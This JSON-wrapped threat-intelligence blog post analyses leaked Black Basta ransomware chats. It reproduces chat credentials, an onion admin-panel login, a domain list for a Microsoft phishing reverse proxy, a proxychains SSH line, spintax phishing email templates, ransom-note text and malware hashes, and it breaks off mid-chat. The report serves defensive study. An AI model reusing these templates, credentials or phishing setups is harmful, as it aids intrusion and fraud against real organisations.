{
	"id": "f6547f18-e908-4da7-89bf-ac3e1ca79323",
	"created_at": "2026-04-06T00:14:12.782902Z",
	"updated_at": "2026-04-10T13:12:16.448805Z",
	"deleted_at": null,
	"sha1_hash": "85bc8992c6e30f3420a14d18e477242505872058",
	"title": "Inside BlackBasta: What Leaked Conversations Reveal About Their Ransomware Operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1879900,
	"plain_text": "Inside BlackBasta: What Leaked Conversations Reveal About\r\nTheir Ransomware Operations\r\nArchived: 2026-04-05 15:40:53 UTC\r\nBlog\r\nExecutive Summary\r\nRecently, a series of private chat logs was leaked from the group that distributes the ransomware\r\nknown as ‘Black Basta’. The chat logs contain general conversations and insights into their operations and their\r\ninternal infrastructure. Such observations of how a group operates and communicates are rare, and provide\r\ninsight into their Tactics, Techniques \u0026 Procedures (TTPs).\r\nWhat is BlackBasta ransomware?\r\nBlack Basta is a ransomware strain that uses the ChaCha20 and XChaCha20 symmetric encryption algorithms to\r\nencrypt the files it holds for ransom. Black Basta infections have been seen mostly against Small and Medium-Sized Enterprises (SMEs), and the group appears to use public services for victim selection.\r\nVictims of Black Basta ransomware cover a diverse range of industries, including Construction, Law,\r\nTransportation, Manufacturing, Electrical, and Financial Services.\r\nGeographically, the most targeted regions include the United States, Germany, the United Kingdom, Canada, Italy,\r\nand Switzerland.\r\nIntroduction\r\nThis comprehensive overview provides valuable insight into the recently leaked conversations, which span from\r\nSeptember 2023 to June 2024. These discussions collectively offer a deeper understanding of the group’s\r\noperations, including their tactics, decision-making processes, and strategic shifts over time.\r\nThis analysis concentrates solely on the dataset derived from bestflowers.json, which was disclosed by a\r\nsource known as “ExploitWhispers” through Telegram.\r\nThreat Actor Insights\r\nCurrent Status of Black Basta Ransomware\r\nRecent indications suggest that Black Basta is currently inactive. 
The latest information regarding the group\r\nreveals a period of inactivity since the beginning of the year, attributed to internal conflicts. For further details.\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 1 of 30\n\nFigure 1: Black Basta Inactivity\r\nSource of the Leak\r\nThe leak initially popped up on Telegram (= whisper stop) mentioning a https[:]//mega[.]nz link which was\r\npromptly taken down.\r\nFigure 2: Dataset Leaks\r\nFigure 3: Black Basta Inactivity\r\nRevenue Based Target Selection\r\nCommercial services such as Revenue Storm and Zoominfo seem to have been heavily used to select targets\r\nacross different geographies. Depending on the dataset available online, direct links describing the potential\r\nvictims were shared:\r\nrevenue_6B_to25M.csv\r\nFOUND_USA_revenue_6B_to_25M.csv\r\nFOUND_Canada_revenue_10B_to_15M.csv\r\n@usernamegg\r\nI think that 200-300 million earned and 10% is normal\r\nIn this regard, our approach is +- the same, I also understand that foot soldiers will never be able to conduct\r\nThat's why now I'm trying to strengthen the team with competent personnel.\"\r\nBlack Basta Organisation\r\nThe analysis of the conversations reveals an intriguing observation. 
The members of Black Basta conduct\r\nthemselves, as if it were an ordinary day at work, engaging in general discussions about their usual operations.\r\n@usernamegg\r\nHi\r\neveryone is getting things going\r\nwhat will be the hashes\r\ndid you have work in the summer?\r\n@usernameboy\r\nOkay, no, we were resting\r\nis the capacity OK?\r\nHuman Element\r\nBreakdown of the Chat Contributors\r\nThe use of various potential chat systems has been noted among the members, who frequently refer to a “new\r\nelement.”. This term may indicate a shift in the chat system, the formation of a new group chat, or the exploration\r\nof an alternative communication platform.\r\n@usergg\r\nHi, waiting for contacts\r\nLogin: pro100boy Password: 4W1VSS!xZVaSGEDg%bgwr1GwTSx3fdvTVtt5vEAR\r\nMail: pro100boy@electionusa2025[.]shop\r\nI'm leaving here\r\nusergg - look for me by this nickname in the new element (chat?)\r\nThe visualization of the 79 threads and 48 contributors reveals collaboration patterns with a dominant central hub\r\nand peripheral clusters of connected users.\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 5 of 30\n\nFigure 4: User Collaboration Network\r\nFrom a purely volumetric perspective, a small number of users have generated the majority of the content within\r\nthe groups. The use of username aliases appears to be a consistent trend. Is there a consensus among the most\r\nactive contributors regarding a fixed alias? Could it be that the same user is behind these aliases?\r\nMessage Analytics\r\nWho is the largest contributor to the Black Basta chats?\r\nBased on our observations, the image below presents analytics regarding the most engaged active users. 
Notably,\r\n“usernamegg” stands out as the most active participant, demonstrating the highest level of interaction within the\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 6 of 30\n\nobserved chat leaks.\r\nFigure 5: Black Basta Message Analytics\r\n@usernamegg has been observed to be the “head of the operations” taking a big part of the decision making,\r\nadministrative tasks. Here is an example of @usernamegg creating new accounts and move chats over to new\r\ndomains:\r\nusernamegg,matrix.bestflowers247.online,Login: pro100boy Password: 4W1V...omitted...vEAR Mail: pro100boy@electi\r\nusernamegg,matrix.bestflowers247.online,Login: user777 Password: t3gg...omitted...TsvD Mail: user777@electionusa\r\nusernamegg,matrix.bestflowers247.online,Login: hunterpass Password: tVgV!...omitted...AXdBa Mail: hunterpass@ele\r\nusernamegg,matrix.bestflowers247.online,electionusa2025[.]shop\r\nusernamegg,matrix.bestflowers247.online,Login: ugway Password: Re@@...omitted...qAvV Mail: ugway@electionusa2025\r\nusernamegg,matrix.bestflowers247.online,Login: userlapa Password: CdFR...omitted...tdAC Mail: userlapa@electionu\r\nusernamegg,matrix.bestflowers247.online,Login: burrito Password: !2Qs...omitted...xACW Mail: burrito@electionusa\r\nusernamegg,matrix.bestflowers247.online,Login: timber Password: xBd4...omitted...ADe3 Mail: timber@electionusa20\r\nusernamegg,matrix.bestflowers247.online,Login: chuck Password: qeg2...omitted...@!v25 Mail: chuck@electionusa202\r\nusernamegg,matrix.bestflowers247.online,Login: cameron Password: B4R%...omitted...X%dDg Mail: cameron@electionus\r\nusernamegg,matrix.bestflowers247.online,Login: cob_crypt_ward Password: SaTB...omitted...tbxVe Mail: cob_crypt_w\r\nusernamegg,matrix.bestflowers247.online,Login: han Password: zeeC...omitted...QGad Mail: han@electionusa2025[.]s\r\nusernamegg,matrix.bestflowers247.online,electionusa2025[.]shop - server name\r\nusernamegg,matrix.bestflowers247.online,Login: znet 
Password: @@dr...omitted...1wEA Mail: znet@electionusa2025[.\r\nTruly Global Operation\r\nWe have put together the geographical locations involved, based on public IP data relating to over 3000 leaked IP\r\naddresses, including both compromised infrastructure and victims. This highlights the low-cost of available\r\ninfrastructure and ease of access/compromise devices that can be utilised to launch attacks, host intermediate\r\ninfrastructure on, or use for Command and Control.\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 7 of 30\n\nFigure 5: Black Basta IP locations\r\nSituational Awareness\r\nThe group conducted thorough monitoring of their online presence, exchanging messages about themselves a total\r\nof 65 times. Black Basta has been diligently tracking reports concerning the group, as well as other entities such as\r\nBlackCat, Rhysida, LockBit, Kaseya, and Stormous, and their related articles.\r\nTimeline of users within the chat, the volume of messages and how that is spread over the duration of the chat\r\nlogs:\r\nFigure 6: News Awareness\r\nLockBit disruption discussion\r\nBlack Basta reacts to law enforcement taking down LockBit servers via PHP vulnerabilities.\r\nusernameyy,https: //www.bleepingcomputer.com/news/security/lockbits-seized-site-comes-alive-to-tease-new-police\r\nusernameyy,poor guy\r\nusernamegg,we could have the same outcome at any moment\r\nusernamegg,all old chats need to be deleted so that they can't be restored)\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 8 of 30\n\nusernameyy,thank God our servers with keys are not connected to the admin panel at all\r\nusernameyy,we've done everything correctly\r\nusernamegg,time will tell)\r\nusernameyy,they've taken a harsh approach to ransom\r\nusernameyy,they put a guy from Revil in jail a couple of days ago\r\nusernameyy,13 years old\r\nusernamegg,yes\r\nusernamegg,I saw\r\nChatter with LockBit Support after FBI 
report\r\nAn intriguing dialogue with Lockbit Support followed the release of a report by the FBI. This conversation\r\nhighlights concerns surrounding a particular issue related to PHP vulnerable servers utilised by the FBI. The\r\ndiscussion appears to pivot towards Black Basta, suggesting they are working on a solution to address this matter.\r\n2024-02-20 09:42:25\r\n[11:14:26] BB: Hello\r\n[11:14:33] BB: What's going on?\r\n[11:14:38] BB: How are you there?\r\n[11:14:43] BB: https: //www.bleepingcomputer.com/news/security/lockbit-ransomware-disrupted-by-global-police-ope\r\n[11:57:27] LockBit: FBI uses vulnerable PHP to hack a couple of servers, servers with data are intact, I'm sitti\r\n[12:42:00] BB: I ponyl, I'll fix it, everything will be fine ok.\r\nObserved Discussions on Rhysida Ransomware\r\nWe have thoroughly examined and analysed various discussions surrounding Rhysida ransomware, drawing\r\ninsights from multiple sources and reports, including those from Trend Micro and SentinelOne.\r\nThese discussions also referenced links to the Rhysida onion leak site, raising questions about its credibility as the\r\n“first office blog.” The conversations indicate a proactive approach to monitoring Rhysida’s activities, likely for\r\nthe purposes of competitive intelligence or to identify operational overlaps.\r\nNegotiation\r\nFrom the typical ransom.txt:\r\n\"- Do not hire a recovery company. They can't decrypt without the key.\r\nThey also don't care about your business. They believe that they are\r\ngood negotiators, but it is not. They usually fail. So speak for yourself.\"\r\n\"Hello ...omitted victim...\r\nThank you for joining this private chat. This chat is secure and confidential. It is all TLP: Red and only desig\r\nTypically we will send an introductory message explaining who we are, and what is going on with your systems, an\r\nFirst, we understand that most likely we are now talking to a Mandiant representative. 
This means you know who B\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 9 of 30\n\nSecond, we hope you realize that while Mandiant is the one curating the investigation, our counterpart here is .\r\nNow, when we covered the negotiation side, we will go straight to the case.\r\nAs you yourself know, we had locked over 12000 of your servers and harvested 3 TB of your data. In any other cas\r\nHOWEVER, in this case, the situation is different.\r\nYou are a hospital network, moreover, a religious one, and we are not some deplorable garbage like the other gro\r\nSo, please read this VERY CAREFULLY:\r\nWe are aware of the current disruptions, from diverted ambulances to cancelled surgery appointments. This wasn't\r\nHence, this is our proposal.\r\nRight now, you perform a medical triage. Think, assess and figure out what you can tell us on what can be done t\r\nTechnical Analysis\r\nThrough our analysis of the conversations, we have identified several tools that the group employs to support their\r\noperations.\r\nAttack Vectors\r\nBased on the dataset observed in the bestflowers.json we have observed the following attack vectors being\r\nused by Black Basta during the timeframe of the conversations that were leaked online.\r\nPhishing Attacks – Performing large-scale phishing campaigns targeting Microsoft services like Office\r\n365 and Azure. 
The attackers register and configure fraudulent domains, obtain SSL certificates, and use\r\nreverse proxies to intercept login credentials and session cookies, bypassing MFA protections.\r\n#### **May 15, 2024 - 19:31:50**\r\n- **UsernameGG:**\r\n \"[21:45:31] _: There are no TXT records on the domains yet (needed to issue the certificate), I will only be a\r\n [21:46:01] _: Reference for the panel\r\n [21:46:12] _: 29:AF:EE:84:8D:C6:FD:86:3F:F0:FA:9A:F1:0E:9B:51:AF:CE:A0:34:E8:81:02:61:E4:B2:E6:66:14:15:0C:C0\r\n [21:46:12] _: https[:]//jyrl5cskoqv5miqssygjmfnqq7c6s3vrxuo2dehej2jj5vxvw4ukeeid.onion:8081/K4fUPie-pZaLjS9TjB\r\n [21:46:15] _: admin_panelp/iePUTTCgKRJANw7;jF35Si53KMC\r\n [21:46:23] _: admin_panel\r\n [21:46:25] _: EF;p/iePUTTCgKRJANw7;jF35Si53KMC\r\n [21:46:31] _: Login credentials\r\n [21:46:42] _: The first thing is the sha256 fingerprint of the certificate that needs to be verified\r\n [21:46:54] _: Then the link, login, password\r\n [21:48:03] _: I’ll be AFK for about 8 hours\r\n [21:58:03] **AA:** ++\"\r\n#### **May 15, 2024 - 20:30:11**\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 10 of 30\n\n- **UsernameYY:**\r\n \"https[:]//jyrl5cskoqv5miqssygjmfnqq7c6s3vrxuo2dehej2jj5vxvw4ukeeid.onion:8081/K4fUPie-pZaLjS9TjBzhuxPVDcUeCQ\r\n basic:\r\n admin_panel\r\n EF;p/iePUTTCgKRJANw7;jF35Si53KMC\"\r\n#### **May 16, 2024 - 09:00:25**\r\n- **UsernameGG:**\r\n \"[Pending - 2024-05-15]\r\n [16:51:55] **AA:** Hey\r\n [16:51:57] **AA:** ?\r\n [16:55:49] _: Hi, I'm here\r\n [16:55:58] _: About Microsoft phishing reverse\r\n [16:56:29] _: Keep in mind that for it to work, about 25 domains need to be set up\r\n [16:56:51] **AA:** Hi\r\n [16:56:53] **AA:** Yeah\r\n [16:56:56] **AA:** Why so many?\r\n [16:57:08] **AA:** Are you intercepting cookies?\r\n [16:57:12] **AA:** Will you set everything up?\r\n [16:57:21] _: office365.com: // *.res.\r\n [16:57:21] _: live.com:\r\n [16:57:21] _: s-microsoft.com:\r\n [16:57:21] _: 
microsoftonline.com:\r\n [16:57:21] _: microsoft.com: // *.pipe.aria.\r\n [16:57:21] _: microsoft365.com:\r\n [16:57:21] **AA:** I’ll be doing corporate phishing\r\n [16:57:21] _: office.com: // *.delve.\r\n [16:57:21] _: office.net: // *.cdn. *.public.cdn.\r\n [16:57:21] _: msftauth.net:\r\n [16:57:21] _: msauth.net:\r\n [16:57:21] _: azure.com:\r\n [16:57:21] _: googleapis.com:\r\n [16:57:21] _: azureedge.net:\r\n [16:57:21] _: akamaized.net:\r\n [16:57:21] _: sharepoint.com:\r\n [16:57:21] _: 1drv.ms:\r\n [16:57:21] _: live.net:\r\n [16:57:21] _: msecnd.net:example.com\r\n [16:57:21] _: clarity.ms:example.com\r\n [16:57:21] _: adnxs.com:example.com\r\n [16:57:21] _: 3lift.com:example.com\r\n [16:57:21] _: c.bing.com:example.com\r\n [16:57:22] _: godaddy.com:\r\n [16:57:22] _: adfs:\r\n [16:57:22] _: github.com:\r\n [16:57:22] _: githubassets.com:\r\n [16:57:22] _: okta.com:\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 11 of 30\n\n[16:57:23] _: oktacdn.com:\r\n [16:57:28] _: These are the domains that need to be replaced\r\n [16:57:32] _: That’s why there are so many\r\n [16:57:33] _: The interception is working\r\n [16:57:41] _: We need proxies and domains\r\n [16:57:45] **AA:** Alright\r\n [16:57:47] _: You add the domains yourself, I can help with the rest\r\n [16:57:51] **AA:** How much do you charge for setup?\r\n [16:58:00] _: Everything is already set up\r\n [16:58:07] _: The deployment will be ready in 20 minutes\r\n [16:58:15] **AA:** What about domains?\r\n [16:58:27] _: You install the domains\r\n [16:58:36] **AA:** Where?\r\n [16:58:44] _: In the panel, I’ll send the address\r\n [16:58:44] **AA:** I have to set up the domains?\r\n [16:58:48] _: And the IP where to install as well\r\n [16:59:01] _: Do not use newly registered domains or it will be flagged\r\n [16:59:05] _: We need dropped domains\r\n [16:59:25] **AA:** Do you know anyone selling them?\r\n [16:59:30] _: Yes\r\n [16:59:37] **AA:** Can you buy them 
yourself?\r\n [16:59:40] **AA:** I’ll send the money\r\n [16:59:51] **AA:** I need to test if it works\r\n [16:59:51] _: Okay\r\n [16:59:55] **AA:** Will this method work?\r\n [17:00:10] _: BTC/XMR?\r\n [17:00:34] **AA:** If I can intercept their cookies and instantly access Microsoft SSO Security\r\n [17:00:39] **AA:** There will be many opportunities\r\n [17:00:46] **AA:** BTC\r\n [17:00:59] _: bc1q52e6l39xsaxjhz66qpdh8msacrnf5q0a0fn364\"\r\nCredential Stuffing for Remote Access – Brute-force attacks, exploits or utilising leaked, stolen or\r\nExposed login credentials for major enterprise remote access portals, including:\r\nVPN and Firewall products including: Citrix, Checkpoint, SonicWall, Pulse Secure, ScreenConnect,\r\nGlobalProtect, Juniper Secure Connect, RDP and RDWeb\r\nAdmin credentials leaked alongside user passwords\r\nActive brute-force testing on Citrix portals with confirmed success.\r\nMention of BMT (possibly botnet infrastructure) and IP tracking:\r\n64.176.219[.]106 repeatedly referenced in the conversations\r\n@usernamegg\r\nI have a mail pass 500k database\r\ncan you decrypt it?\r\nhow long will it take?\r\n\u003cpresumably @usernamegg sharing hashes\u003e\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 12 of 30\n\nphoto_2023-10-03 15.37.25.jpeg\r\nphoto_2023-10-03 15.37.28.jpeg\r\n@usernameboy\r\nWe need to understand what type of hash it is, I'll figure out what it is\r\nThere are well over 1000 messages about credential dump / brute-forced password 
files:\r\n1FORTI_VALID_REVENUE.txt\r\n2FORTI_BRUTED_VALID_REVENUE.txt\r\nADFS_VALID_idpinitiatedsignon.txt\r\nAUTH_FROM_APOLLO_VALID_20240209.txt\r\nAUTH_FROM_APOLLO_VALID_20240210.txt\r\nAUTH_FROM_APOLLO_VALID_20240211.txt\r\nAUTH_FROM_APOLLO_VALID_20240212.txt\r\nAUTH_FROM_APOLLO_VALID_20240213.txt\r\nAUTH_FROM_APOLLO_VALID_20240214.txt\r\nAUTH_FROM_APOLLO_VALID_20240215.txt\r\nAUTH_FROM_APOLLO_VALID_20240216.txt\r\nAUTH_FROM_APOLLO_VALID_20240217.txt\r\nAUTH_FROM_APOLLO_VALID_20240218.txt\r\nAUTH_FROM_APOLLO_VALID_20240222.txt\r\nAUTH_FROM_APOLLO_VALID_20240223.txt\r\nAUTH_FROM_APOLLO_VALID_20240224.txt\r\nAUTH_FROM_APOLLO_VALID_20240225.txt\r\nAUTH_FROM_APOLLO_VALID_20240226.txt\r\nAUTH_VALID_.txt\r\nAUTH_VALID_20240209.txt\r\nAUTH_VALID_20240211.txt\r\nAUTH_VALID_20240212.txt\r\nAUTH_VALID_20240213.txt\r\nAUTH_VALID_20240214.txt\r\nAUTH_VALID_20240215.txt\r\nAUTH_VALID_20240216.txt\r\nAUTH_VALID_20240222.txt\r\nAUTH_VALID_OWA.txt\r\nCISCO_BRUTED_VALID_IPS.txt\r\nCISCO_BRUTED_VALID_IPS.txt\r\nCISCO_BRUTED_VALID_IPS_REVENUE.txt\r\nCISCO_BRUTED_VALID_ITEMS.txt\r\nCISCO_BRUTED_VALID_ITEMS_REVENUE.txt\r\nCISCO_VALID_ITEMS.txt\r\nCISCO_VALID_ITEMS16.txt\r\nCISCO_VALID_ITEMS_.txt\r\nCW_VALID_AU.txt\r\nCW_VALID_CA.txt\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 13 of 
30\n\nCW_VALID_CH.txt\r\nCW_VALID_DE.txt\r\nCW_VALID_FR.txt\r\nCW_VALID_GB.txt\r\nCW_VALID_HK.txt\r\nCW_VALID_NZ.txt\r\nCW_VALID_US.txt\r\nFORTI_BRUTED_VALID_REVENUE.txt\r\nforti_hkcu.txt\r\nforti_hklm.txt\r\nFORTI_VALID_.txt\r\nFORTI_VALID_FROM_ALL_FILES_REVENUE.txt\r\nFORTI_VALID_FROM_ALL_FILES_REVENUE.txt\r\nFORTI_VALID_FROM_SPM.txt\r\nFORTI_VALID_REVENUE.txt\r\nPALO_VALID_FILTERED.txt\r\nSONIC_BRUT_VALID_REVENUE.txt\r\nSONIC_VALID_.txt\r\nSONIC_VALID_ITEMS_REVENUE.txt\r\nSOPHOS_VALID_.txt\r\nVALID_2kkdomains.txt\r\nVALID_BRUT_CISCO\r\nVALID_BRUT_CISCO16.txt\r\nVALID_BRUT_FORTI.txt\r\nVALID_BRUT_RDWE\r\nVALID_BRUT_RDWEB.txt\r\nVALID_BRUT_RDWEB16.txt\r\nVALID_BRUT_RDWEB_.txt\r\nVALID_BRUT_SONIC.txt\r\nVALID_BRUT_SONIC16.txt\r\nVALID_BRUT_SONIC_.txt\r\nVALID_PANELS_LIST_FOR_SHELLS.txt\r\nVALID_corps_randomize.txt\r\nVALID_need.txt\r\nThe group also had discussions regarding payments for hash cracking and password decryption services.\r\n@usernamegg\r\nI found a request where it will be OK for brute force\r\nforti doesn't break the connection there\r\nbut authorization encrypted\r\nenc=00b078b248a68a5b95d7a92fb...omitted...32759bf2600000000000000000000000000\r\nthis is the request that is sent\r\nand it is hardcoded there lmcintyre:ca...omitted...burger22!\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 14 of 30\n\nthere seems to be salt here\"\nyes, we need to figure out how many iterations, but it will be slow anyway\nUse of Malicious Scripts – Executing scripts (e.g., ‘.vbs’, ‘.msi’) to establish persistence.\nRemote Code Execution (RCE) – Running commands through compromised access.\nExploiting Cloud \u0026 SaaS Services – Obtaining unauthorised access to enterprise services.\nSocial Engineering via IT Spoofing – Impersonating IT departments to gain access to sensitive\ninformation.\nSOCKS Proxy Usage for Anonymisation – Utilising compromised proxies for stealthy operations.\nproxychains ssh root@216[.]146.25.53 = 
mickiemckittrick[.]net USA\nPassword: A5WV...omitted..._Kw5RbYD3E\nTargeting Jenkins – Conducting reconnaissance and information gathering.\nAutomated Botnets \u0026 Load Balancing – Employing bots for scanning and automating attacks.\nMalicious Attachments – Crafting deceptive messages to circumvent security measures. The aliases\n@lapa and @usernamegg have been discussing email templates, @usernamegg sharing 20 email templates\non 2023-09-25:\nTinker first set - 10 emails for file\nDear Recipient,\nI {hope|trust|wish|believe}, this message {finds|reaches|arrives to|meets}, you in {good|excellent|prime|fine},\nGreetings.\nFor your {convenience|ease|benefit|comfort}, the {document|file|material|record}, you've been {waiting|looking|h\nHello,\nI {trust|believe|hope|assume}, this email {reaches|arrives to|gets to|happens upon}, you {promptly|quickly|speed\nGood day!\n{Acknowledging|Recognizing|Noting|Observing}, your {request|inquiry|demand|query}, from our {recent|latest|previ\nGood day.\nIn {line|accordance|alignment|conjunction}, with our {previous|prior|earlier|last}, {discussion|conversation|tal\nHello, Sir/Madam.\nOur {team|group|crew|unit}, has {prepared|readied|set up|arranged}, and {attached|affixed|linked|added}, the {fi\nDear Colleague,\nPlease {find|locate|see|identify}, {attached|enclosed|affixed|appended}, the {documents|papers|files|materials},\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\nPage 15 of 30\n\nGreetings.\r\nIn our {continued|ongoing|persistent|sustained}, {effort|endeavor|attempt|drive}, to {serve|assist|help|support}\r\nHello,\r\n{Thank|Appreciate|Gratitude|Acknowledgment}, you for your {patience|tolerance|forbearance|endurance}. 
{Enclosed\r\nDear Sir/Madam,\r\nYour {requested|desired|asked-for|sought}, {documents|papers|files|materials}, are now {ready|set|prepared|good}\r\n\"Second set - 10 emails for link - I had to test here to keep the dialog format\"\r\nHey,\r\n{Hope|Trust|Believe|Wish}, you're {doing|feeling|going|being}, well. I've {dropped|left|placed|set}, the link {h\r\nHi,\r\n{Hope|Trust|Believe|Wish}, you're well. I've {attached|linked|added|included}, the link you {requested|asked for\r\nHello,\r\n{Just|Simply|Only|Merely}, wanted to {shoot|send|forward|give}, you the link. {Also|Moreover|Furthermore|Plus},\r\nHey there,\r\n{Remember|Recall|Recollect|Think about}, that link you {asked|inquired|questioned|wondered}, about? {Here|Here i\r\nHi,\r\nI've {secured|obtained|got|acquired}, the link you were {inquiring|asking|querying|wondering}, about {earlier|be\r\nHey,\r\n{Here's|Here is|This is|Presenting}, that link. {Thought|Felt|Believed|Considered}, you'd {like|love|want|prefer\r\nHello,\r\nI am {ensuring|making sure|guaranteeing|assuring}, you {received|got|obtained|acquired}, the gateway link in a {\r\nHey,\r\nAs {promised|stated|said|told}, {here's|here is|this is|I'm sending}, the link. And... it's your gateway to {und\r\nHello,\r\n{Here's|Here is|This is|Presenting}, the link. {Beyond|Apart from|Outside of|Besides}, the main {stuff|content|m\r\nHi,\r\n{Here's|Here is|This is|Presenting}, the link you {mentioned|talked about|spoke of|referred to}, the {other|prev\r\nGood day,\r\nI've {provided|given|offered|supplied}, the link as {requested|asked for|wanted|demanded}. {Beyond|Outside|Apart\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 16 of 30\n\nMalware shared\r\nDiscussions have highlighted the presence of potential malicious file samples. It appears that members were\r\nverifying the samples they had uploaded or checking for any that had been reported. 
Additionally, a new collection\r\nhas been added to VirusTotal.\r\nVTDIFF: https://www.virustotal.com/gui/diffs/detail/21507568815\r\nDarkGate\r\nFile Formats: PDF and MSI\r\nSamples referenced:\r\nPDF: 74c69940f96ccad21c7bfa75d6ee8dec4a78b16e0a32abe104d24c2076a574d5\r\nMSI: 693ff5db0a085db5094bb96cd4c0ce1d1d3fdc2fbf6b92c32836f3e61a089e7a\r\nPikaBot\r\nFile Formats: JS and EXE\r\nSamples referenced:\r\nJS: ce616c5d472d8d22169e1cabd8c99a511394b1c28febc944f427137a0354e8db\r\nEXE: f4be945a6678a11bc4d2e3819cba8b91665eaf99e152cf0348e16d1fd94b2e75\r\nWshrat\r\nFile Formats: JS\r\nSamples referenced:\r\nJS: 6199895decf1e8dd173ffeb8818fe49069c2a53fd446e2b32de4c8dda99a79de\r\nRemcosRAT\r\nFile Formats: IMG and CAB\r\nSamples referenced:\r\nIMG: 150db7e3c65a152c3a056733e8b42451ff22f13b10c6676bf4933d6f4e0797ad\r\nCAB: c5793613219a782eb08205921a3f9ed97c2c74de18e0cd36008046d1a5e1288e\r\nGuLoader\r\nFile Formats: VBS\r\nSamples referenced:\r\nVBS #1: 4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001\r\nVBS #2: dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86\r\nOther / Unspecified Malware\r\nThe logs also reference 
additional individual samples without a specific malware family name. These\r\ninclude:\r\nLNK: 462c92282bd4dff657faf6de04a6da96572bfad06bae7ecb15c922c74be96b30\r\nEXE in RAR: c111221c3c59b9f9c50d57c3880a4c09ecbc358e5bbe69e44b3945660ceb07bb\r\nMSI: 336f7e8de57d29f4360210eaf46b33b414c0c22bd0bdadf5bdecbdf46474d898\r\nHTA: ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b\r\nDOC: a30798880eab8c6158073a38e63d5c014de3976e623e38c29b65dc1e6b0be3ef\r\nRTF (2017 CVE): a633ede541f3b86835ba11aea4278db5b37bb7040a6bb81f057819c0fafcdc99\r\nAdditional “Backdoor” Sample\r\nOne sample is specifically called out as a “backdoor” but no clear family name is given:\r\n3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\r\nReconnaissance\r\nIn the conversations we analysed, we identified discussions regarding the use of Shodan, Fofa, and ZoomInfo for\r\ninformation gathering. In this context, participants were conducting reconnaissance to gather data about their\r\ntargets, which could subsequently be exploited.\r\nShodan \u0026 Fofa \u0026 ZoomEye – Used for scanning endpoints that are exposed to the internet.\r\nReconnaissance is a very important part of the attack, and the users lapa and gg seem to be the main fans of\r\nthe tools, sharing a lot of 
output:\r\ncitrix_us_fofa.txt\r\ncheckpoint_eu_fofa.txt\r\ncheckpoint_ca_fofa.txt\r\ncheckpoint_us_fofa.txt\r\nscreenconnect_gb_fofa.json\r\nscreenconnect_gb_fofa.txt\r\nscreenconnect_de_fofa.txt\r\nscreenconnect_de_fofa.json\r\nscreenconnect_au_fofa.txt\r\nscreenconnect_ch_fofa.txt\r\nscreenconnect_ch_fofa.json\r\nscreenconnect_nz_fofa.txt\r\nscreenconnect_nz_fofa.json\r\nscreenconnect_us_fofa.txt\r\nscreenconnect_us_fofa.json\r\nscreenconnect_ca_fofa.txt\r\nscreenconnect_ca_fofa.json\r\nscreenconnect_au_fofa.json\r\nscreenconnect_fofa.tar.gz\r\npulse_us_fofa.txt\r\npulse_ca_fofa.txt\r\npulse_eu_fofa.txt\r\nrdweb_eu_fofa.txt\r\nrdweb_ca_fofa.txt\r\nrdweb_us_fofa.txt\r\nsonicwall_us_fofa.txt \"he has 300k of them here\" https://en.fofa.info/result?qbase64=InNvbmljd2FsbCIgJiYgY291bnR\r\nsonicwall_us_zoomeye.tar.gz\r\nSonicWALL_CA_zoomeye.tar.gz\r\nJenkins_US_zoomeye.tar.gz\r\nJenkins_ca\u0026gb\u0026de\u0026au\u0026ch\u0026nz_zoomeye.tar.gz\r\nCurrent Report of the Shodan Search looking to find Outlook Web Application(OWA): Shodan Search\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 19 of 30\n\nFigure 7: Shodan\r\nAnd FOFA for the same:\r\nFigure 8: FoFa Search 1\r\nSimple FOFA Search employed by Black Basta targeting US SonicWall customers: FOFA Search Engine\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 20 of 30\n\nFigure 9: Fofa Search 2\r\nLink appearing to a public github repository of https://github.com/netsecfish, targeting D-Link ShareCenter Cloud\r\nStorage (NAS):\r\nFigure 10: Fofa Search 3 – https://github.com/netsecfish/dlink/blob/main/fofa-result.png\r\nZoomInfo – Likely used for gathering intelligence on the target organisation.\r\nInitial Access \u0026 Credential Exploitation\r\nHash Cracking Services – @usernameboy joined the forum and @usernamegg asked for a price regarding\r\nNTLM Hashes, with the price of 300 (assumed USD)\r\nusernamegg,\"I found the 
request\r\nusernamegg,okay\r\nusernamegg,I can't figure it out yet\r\nusernamegg,on a single connection\r\nusernameboy,Yes\r\nusernameboy,Hi\r\nusernameboy,we need to agree on the price for this type of hash netntlm \u003entlm\r\nusernamegg,dp\r\nusernamegg,come on\r\nusernamegg,what's the price?\r\nusernameboy,I think 300\r\nusernameboy,we need a full brute force there\r\nusernameboy,100 for 3\r\nusernamegg,okay\r\nusernamegg,come on\r\nusernamegg,300 let's try to start\r\nusernamegg,well,did you understand how to decrypt them?\r\nusernameboy,Yes,I know\r\nusernameboy,I've been looking for this more than once\r\nusernamegg,has anyone ordered this from you before?\r\nusernamegg,were there any successful finds?\r\nusernameboy,Yes\r\nusernameboy,found\r\nusernamegg,well yes\r\nusernameboy,only it takes time\r\nusernamegg,yes\r\nusernamegg,okay\r\nusernamegg,how long did it take you to find + -?\r\nusernameboy,Yes it varies but 6 hours minimum\r\nusernamegg,what kind of power do you have?\r\nusernamegg,so I can roughly 